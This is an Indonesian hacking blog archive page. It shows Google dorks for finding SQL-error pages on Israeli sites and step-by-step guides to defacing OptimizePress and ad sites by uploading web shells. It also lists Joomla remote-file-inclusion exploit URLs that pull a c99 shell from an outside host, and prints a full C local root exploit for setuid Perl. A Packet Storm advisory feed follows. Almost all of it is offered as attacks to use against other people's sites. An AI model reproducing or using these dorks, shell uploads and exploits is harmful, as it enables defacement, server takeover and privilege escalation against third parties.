Home » Archives for 07/17/14

Kamis, 17 Juli 2014

Tutorial Install Sqlmap Di VPS

    
     
           Haii wkwkwk udh lama gk ngepost nih wkkwk soalnya pensiun bentar trus skrg balik lagi oke kali ini saya akan share tutor install SQLMAP Di VPS
Bahan-Bahan :
-PC Yang sudah terconnect di Internet
-Putty For Windows
-Akun VPS
Langkah-langkah :
1.Buka Putty Lalu Masukan IP VPSnya 
2.ketik “sudo apt-get install git” Kalo Gk bisa “yum install git
3.Ketik “git clone https://github.com/sqlmapproject/sqlmap.git” Lalu Tekan Enter tunggu   Beberapa saat 
4.Jika Sudah Ketikan Perintah "cd \sqlmap"
5.Tinggal Ketik .”./sqlmap.py” atau “python sqlmap.py
Langsung Lihat Videonya 
~> Klik Disini
21.51  Unknown  No comments
Read More

Dork SQL Injection Website Israel

Dork :
intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il
21.45  Unknown  No comments
Read More

Deface dengan optimizepress

Bahan - Bahan :
- Shell ( Terserah Shell Apa )
- Komputer ( Sudah Terkoneksi Internet :D )

Langkah - Langkah :

1).Buka Google.com Masukan Dork Berikut
Dork : inurl:/wp-content/themes/OptimizePress/

2).Kalo Sudah  Menemukan Site
3).Masukan Exploit : /wp-content/themes/OptimizePress/lib/admin/media-upload.php
4).Jika Succes Akan Keluar Halaman Seperti Berikut

5).Scroll Ke Bawah Nanti Ada Uploader Trus Upload Shell Kamu =))
6).Jika Succes Nanti Akan Keluar Nama Shell Kamu Contoh Nama Shell Saya b.php




7).Untuk Letak Shell http://site/wp-content/uploads/optpress/images_comingsoon/yourshell.php
Contoh : http://site/wp-content/uploads/optpress/images_comingsoon//2013121101-39-39b.php
21.43  Unknown  No comments
Read More

Deface Web Iklan

Alat yang di butuhkan hanya pake Live HTTP Headers download DISINI atau bisa pake DISINI 
Dork : intext:pasang iklan gratis ( use your brain :D )
siap kan shell lalu rename menjadi jpg
contoh shell.php.jpg
cari web lalu exploit / tambahkan /banner/pasang
misal www.site.com/banner/pasang



jika sudah ketemu masuk ke pasang iklan banner
lalu isi data asala aja
di kolom form upload kamu masukan shell kamu yang sudah di rename tadi

submit iklan nya lalu nanti akan tampil menu tamper2 nah kamu tamper data nya
cari nama shell.php.jpg lalu kamu rename kembali menjadi shell.php 




dan taraaaaaaaa shell kamu dah masuk ke web tersebut defaul nya ada di target.com/images/bnrs/(namashell).php tapi tergantung setelen web nya juga ..



Selanjutnya terserah anda mau di apain.. 
00.53  Unknown  No comments
Read More

Kumpulan Exploit Joomla


google Dork :
inurl:"com_joomlaboard"
ExpLoit:/components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
ExpLoit:/components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_admin"
ExpLoit:/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_simpleboard
ExpLoit:/components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_hashcash"
ExpLoit:/components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
google Dork :
inurl:"com_sitemap"
ExpLoit:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_forum"
ExpLoit:/components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pccookbook"
ExpLoit:/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_extcalendar
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"minibb"
ExpLoit:/components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_smf"
ExpLoit:/components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_pollxt"
ExpLoit:/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_loudmounth"
ExpLoit:/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_videodb"
ExpLoit:/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:index.php?option=com_pcchess
ExpLoit:/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google Dork;
inurl:"com_multibanners"
ExpLoit:/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_a6mambohelpdesk"
ExpLoit:/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_colophon"
ExpLoit:/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mgm"
ExpLoit:/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_mambatstaff"
ExpLoit:/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_securityimages"
ExpLoit:/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_artlinks"
ExpLoit:/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_galleria"
ExpLoit:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_zoom"
ExpLoit:/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"com_serverstat"
ExpLoit:/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
google Dork :
inurl:"mambo"
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
00.52  Unknown  No comments
Read More

Root Exploit


Bentuk dari exploit itu adalah seperti ini
/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF – kf_lists[at]secnetops[dot]com – 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
Lho ID nya dah root?? xD.. Untuk kernel yang lainnya juga tidak jauh berbeda
Hehehe… Monggo silakan di cari local root exploit yang lain ya
#define PRELOAD “/etc/ld.so.preload”
#include <stdio.h>
#include <strings.h>
int main(int *argc, char **argv)
{
FILE *getuid;
if(!(getuid = fopen(“/tmp/getuid.c”,”w+”))) {
printf(“error opening file\n”);
exit(1);
}
fprintf(getuid, “int getuid(){return 0;}\n” );
fclose(getuid);
system(“cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so
/tmp/getuid.c -lc”);
putenv(“PERLIO_DEBUG=”PRELOAD);
umask(001); // I’m rw-rw-rw james bitch!
system(“/usr/bin/sperl5.8.4″);
FILE *ld_so_preload;
char preload[] = {
“/tmp/getuid.so\n”
};
if(!(ld_so_preload = fopen(PRELOAD,”w+”))) {
printf(“error opening file\n”);
exit(1);
}
fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
fclose(ld_so_preload);
}
dikutip dari http://www.k-otik.com/exploits/20050207.ex_perl.c.php
untuk menyelesaikanya ada dengan cara :
1. boot pake knoppix atau linux rescue
2. trus cari file dengan nama file /etc/ld.so.preload
3. dalam file tersebut isinnya /tmp/getuid.so
4. kalo ada file tersebut hapus ajah jagn ragu2
5. setelah itu boot lage dari harddisk, ngga perlu diinstall ulang
jadi cara kerja dari exploit itu adalah ketika kita booting dia akan mencara file /tmp/getuid.so yang padahal sebenarnya emang ngga ada …. jadi hati hati dengan exploit ini… kalo emang ngga mao dibuat bingung ….
jadi buat temen temen sekalian yang udah ngebantu saya ucapkan terima kasih banyak :) :D
00.50  Unknown  No comments
Read More

Admin Finder [PYTHON SCRIPT]

Hello sobat :D
kali ini saya akan share alat untuk mencari halaman login admin di dalam suatu website :D kan percuma jika tau username dan password si admin, tetapi tidak mengetahui halaman login adminnya :D

Sebelum menggunakan adminfinder.py ?? pastika PC anda sudah terinstall PYTHON ?? jika belom ??
Download disini :
-Download Python

Okkhe sudah kan ?? langsung disedot aja :D
-Download Admin Finder [PYTHON SCRIPT]


Admin Finder

Thanks telah berkunjung ^_^ jangan lupa berkomentar ya ^_^
00.44  Unknown  No comments
Read More

Exploit

EXPLOIT DATABASE

PACKETSTORM DATABASE

  • 16 July 2014: Oracle Data Redaction Is Broken - Files ≈ Packet Storm
    Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.
  • 16 July 2014: pyClamd 0.3.10 - Files ≈ Packet Storm
    pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product.
  • 16 July 2014: Bitdefender GravityZone File Disclosure / Missing Authentication - Files ≈ Packet Storm
    Bitdefender GravityZone versions prior to 5.1.11.432 suffer from local file disclosure, insecure service configuration, and missing authentication vulnerabilities.
  • 16 July 2014: Microsoft Windows DirectShow Privilege Escalation - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Windows. The vulnerability is caused by an input validation error in DirectShow when processing and unserializing "Stretch" objects in memory, which could be exploited to elevate privileges and execute arbitrary code in the context of the logged on user, or e.g. bypass Internet Explorer's Enhanced Protected Mode (EPM) sandbox.
  • 16 July 2014: e107 2.0 alpha2 Cross Site Scripting - Files ≈ Packet Storm
    e107 version 2.0 alpha2 suffers from a reflective cross site scripting vulnerability.
  • 16 July 2014: Citrix Netscaler Disclosure / Cross Site Scripting - Files ≈ Packet Storm
    Citrix NetScaler Application Delivery Controller and Citrix NetScaler Gateway are susceptible to cookie disclosure and reflective cross site scripting vulnerabilities.
  • 16 July 2014: Microsoft Internet Explorer ShowSaveFileDialog() Sandbox Bypass - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused due to an invalid handling of a sequence of actions aimed to save a file when calling "ShowSaveFileDialog()", which could be exploited by a sandboxed process to write files to arbitrary locations on the system and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: OpenVPN Access Server Arbitrary Code Execution - Files ≈ Packet Storm
    Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed.
  • 16 July 2014: Microsoft Internet Explorer Request Object Confusion Sandbox Bypass - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an object confusion vulnerability when processing object types within data shared between the broker and sandboxed processes, which could be exploited by a sandboxed process to achieve code execution within the broker context and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: Microsoft Internet Explorer CSS @import Memory Corruption - Files ≈ Packet Storm
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free vulnerability when manipulating CSS @import statements through "addImport()" or "removeImport()", which could be exploited by attackers to leak arbitrary memory or execute arbitrary code via a malicious web page. Versions 9, 10, and 11 are affected.
  • 16 July 2014: Alfresco Community Edition 4.2.f Server Side Request Forgery - Files ≈ Packet Storm
    Alfresco Community Edition versions 4.2.f and below suffer from multiple server side request forgery vulnerabilities.
  • 16 July 2014: HP Security Bulletin HPSBMU03072 SSRT101644 - Files ≈ Packet Storm
    HP Security Bulletin HPSBMU03072 SSRT101644 - A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code. Revision 1 of this advisory.
  • 16 July 2014: Ubuntu Security Notice USN-2280-1 - Files ≈ Packet Storm
    Ubuntu Security Notice 2280-1 - It was discovered that MiniUPnPc incorrectly handled certain buffer lengths. A remote attacker could possibly use this issue to cause applications using MiniUPnPc to crash, resulting in a denial of service.
  • 16 July 2014: Ubuntu Security Notice USN-2279-1 - Files ≈ Packet Storm
    Ubuntu Security Notice 2279-1 - Ben Hawkes discovered that Transmission incorrectly handled certain peer messages. A remote attacker could use this issue to cause a denial of service, or possibly execute arbitrary code.
  • 16 July 2014: Red Hat Security Advisory 2014-0889-01 - Files ≈ Packet Storm
    Red Hat Security Advisory 2014-0889-01 - The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.

CERT VULNERABILITY DATABASE

SECURITYFOCUS DATABASE

00.39  Unknown  1 comment
Read More

Postingan Lebih Baru Postingan Lama Beranda